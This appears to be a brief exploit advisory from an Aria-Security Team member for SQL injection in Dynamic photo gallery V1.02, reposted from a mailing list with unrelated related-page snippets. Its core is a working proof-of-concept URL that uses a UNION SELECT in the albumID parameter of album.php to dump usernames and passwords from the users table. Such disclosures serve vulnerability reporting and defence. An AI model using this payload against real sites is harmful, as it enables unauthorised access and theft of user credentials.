Dynamic photo gallery V1.02 SQL Injection



Aria-Security Team
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521

PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users


Regards
The-0utl4w



Relevant Pages

  • PHP-Nuke My_eGallery "gid" Remote SQL Injection
    ... Aura, Null, imm02tal, Kinglet, and our staff ... Original Link: http://forum.aria-security.net/showthread.php?p=1490 ...
    (Bugtraq)
  • Re: Finking about flatpots
    ... The staff at a local (South Manchester) vendor of technical gubbins now refer to it as 'Vistoh' as the people who call it that seem to be only ones who actually want it. ...
    (uk.rec.sheds)